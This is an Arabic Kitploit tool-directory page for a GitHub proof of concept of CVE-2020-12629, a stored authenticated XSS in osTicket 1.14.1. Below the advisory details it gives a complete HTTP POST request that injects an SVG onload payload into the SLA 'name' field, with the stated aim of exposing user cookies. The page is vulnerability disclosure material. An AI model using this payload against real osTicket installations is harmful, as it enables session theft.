Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2020-12629 — osTicket 1.14.1 - ثغرة برمجة نصية عبر المواقع (XSS) مصادق عليها ودائمة | Kitploit
أدوات/GitHubGitHub/mkelepce/cve-2020-12629
تحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubmkelepce/cve-2020-12629

CVE-2020-12629

osTicket 1.14.1 - ثغرة برمجة نصية عبر المواقع (XSS) مصادق عليها ودائمة

عرض المستودع
4منذ 6 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

العنوان: osTicket 1.14.1 - البرمجة النصية عبر المواقع المستمرة والمصادق عليها
المؤلف: Mehmet Kelepce / Gais Cyber Security
التاريخ: 2020-03-24
رابط المصدر: https://github.com/osticket/osticket/commit/fc4c8608fa122f38673b9dddcb8fef4a15a9c884
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12629
Exploit-Db : https://www.exploit-db.com/exploits/48413
المورّد: http://osticket.com
قابل للاستغلال عن بُعد: نعم
لغة البرمجة الديناميكية: PHP
درجة CVSSv3 الأساسية: 7.4 (AV:N, AC:L, PR:L, UI:N, S:C, C:L, I:L, A:L)

تم العثور على هذه الثغرة من خلال فحص الكود المصدري.

PoC : اسم خطة مستوى خدمة التذكرة - طلب HTTP POST
-----
POST /upload/scp/slas.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/upload/scp/slas.php?id=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 196
Connection: close
Cookie: cookie=3333; OSTSESSID=684d6hn7dfk869kupbhc9hq2qv
Upgrade-Insecure-Requests: 1

submit=Save+Changes&CSRFToken=6174a3343a6277b2e5faae240188d54624a756d7&do=update&a=&id=1&name=%3Csvg+onload%3Dconfirm%28document.cookie%29%3B%3E&isactive=1&grace_period=48&schedule_id=0&notes=

المعامل القابل للاستغلال: name
ملف المعامل: /scp/slass.php

استخدمت اسم خطة مستوى الخدمة لأي تذكرة.

الخطر : يتم الحصول على معلومات الكوكيز الخاصة بالمستخدم المستهدف.

تنزيل الأداة